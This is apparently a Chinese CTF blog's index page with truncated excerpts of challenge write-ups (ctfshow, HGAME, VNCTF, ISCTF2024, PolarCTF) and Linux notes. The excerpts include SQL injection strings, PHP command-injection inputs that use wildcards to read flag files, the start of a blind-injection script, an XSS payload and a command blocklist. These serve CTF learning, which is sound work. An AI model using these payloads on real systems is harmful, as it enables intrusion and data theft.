polarctf-wp
CRYPTObeginnerfrom Crypto.Util.number import long_to_bytes# 给定的结尾数值suffix = 16732186163543403522711798960598469149029861032300263763941636254755451456334507142958574415880945599253440468447483752611840# 验证suffix是否是2^125的倍数bits_125 = 1 << 125if suffix % bits_125 != 0: raise ValueError("Suffix is not divisible by 2^125, no solution exists.")# 计算S' = suffix / 2^125s_prime = suffix // bits_125# 计算模数5^125mod_5_125 = 5 ** 125# 计算2^9875在模5^125下的逆元inv_2_9875 = pow(2, -9875,...
萌新-web
知识点在之前都学到了,现在就只是做题和补充 web1(php特性)<?php# 包含数据库连接文件include("config.php");# 判断get提交的参数id是否存在if(isset($_GET['id'])){ $id = $_GET['id']; # 判断id的值是否大于999 if(intval($id) > 999){ # id 大于 999 直接退出并返回错误 die("id error"); }else{ # id 小于 999 拼接sql语句 $sql = "select * from article where id = $id order by id limit 1 "; echo "执行的sql为:$sql<br>"; # 执行sql 语句 ...
ctfshow_web
web签到题(源码泄露)源码泄露,注释base64解码 web2(sql注入)简单sql注入,post传参username和password password=1&username=1' or 1=1# //回显欢迎你,ctfshowpassword=1&username=-1' or 1=1 order by 4# //无回显password=1&username=-1' or 1=1 order by 3# //回显欢迎你,ctfshowpassword=1&username=-1' union select 1,2,3# //回显2password=1&username=-1' union select 1,database(),3# //回显web2password=1&username=-1' union select 1,(select group_concat(table_name) from information_schema.tables...
linux基础
一.常见命令(含解释及补充) 1.ls:列出文件目录 选项 作用 示例 -a 列出所有文件(包括隐藏文件) ls -a -l 列出文件及属性,注意大部分操作系统以ll来代替ls -l ls -l -la 列出所有文件及属性(包括隐藏文件) ls -la -h 以易读单位显示文件大小(如 KB、MB,需与 -l 连用) ls -lh -t 按最后修改时间排序(最新文件在前) ls -lt -r 反向排序(配合 -t 或 -S 使用) ls -ltr -S 按文件大小排序(从大到小) ls -lS -R 递归列出子目录内容(显示目录树结构) ls -R --color 彩色输出(默认启用,不同文件类型颜色不同) ls --color=auto -i 显示文件的 inode 编号 ls -i -d 仅显示目录本身(不列出目录内容) ls -d */ / 显示根目录下文件 ls...
web入门-命令执行(已完结)
一.前置知识好像也没什么需要提前知道的,在题目中慢慢积累总结就行 具体的可以参考下写的另一篇文章linux基础 二.题目web29(过滤flag)<?phperror_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);} 在输入中过滤flag,通过通配符?或者*即可绕过(?表示匹配一个字符,*表示匹配多个字符) c=system("ls"); c=system("cat f*.php"); //由于注释,需在源代码中找到flagc=system("tac f*.php"); //倒序可以直接输出flagc=echo `tac...
VNCTFwp
WEB奶龙回家在做的时候尝试了时间盲注,但是MySQL中的sleep和benchmark被ban了,后面尝试无果,看wp才知道是sqlite的时间盲注,先fuzz测试下waf 可知union,benchmark,sleep被过滤,但是实测空格和等号也被过滤了,用/**/代替空格,sqlite中的randomblob()来进行延时,最终脚本如下 import requestsimport timeurl = 'http://node.vnteam.cn:43292/login'flag = ''for i in range(1, 500): low = 32 high = 128 mid = (low + high) // 2 while low < high: time.sleep(0.2) # 构造注入payload payload =...
HGAMEwp
WEBPacman直接在源码中找通关逻辑,在index.js中就可以找到,但是有两个,之前找错了,一直交没对 拿出来base64+栅栏2栏就行 MysteryMessageBoard通过弱口令爆破登录shallot用户,密码888888,然后插入xss的payload后访问/admin <script>var xhr=new XMLHttpRequest();xhr.open("POST", "http://127.0.0.1:8888/", true);xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");xhr.send("comment=" +...
ISCTF2024复现
1z_php<?phphighlight_file('index.php');#一句话木马,神神又奇奇if(isset($_POST['J'])){ $call=$_POST['J']; $dangerous_commands = ['cat', 'tac', 'head', 'nl', 'more', 'less', 'tail', 'vi', 'sed', 'od']; foreach ($dangerous_commands as $command) { if (preg_match("/$command/i", $call)) { die("这些个危险函数可不兴使啊"); ...
web入门-php特性
前言:这里有很多知识点,因此做题带着涨姿势,边做题边补充知识点 一.知识点intval()函数(web89)作用是 PHP 中用于将变量转换为整数的函数。它尝试从给定的变量中提取一个整数值。如果该变量不是整数类型,intval 会根据其内容进行适当的转换。 语法int intval ( mixed $var [, int $base = 10 ] ) $var:要转换的变量。 $base(可选):表示数字的进制,默认是 10 进制。如果指定了其他进制(如 8、16 等),函数会按照该进制进行转换。 返回值返回变量 var 的整数值。如果 var 是布尔值 false,则返回 0;如果是 true,则返回 1。 注意 如果字符串中包含数字和非数字字符,intval 只会提取开头的数字部分,直到遇到第一个非数字字符为止。 如果字符串中没有有效的数字,intval 将返回 0。 intval当传入的变量也是数组的时候,会返回1 base变量位的0表示根据var开始的数字决定使用的进制: 0x或0X开头使用十六进制,0开头使用八进制,否则使用十进制。...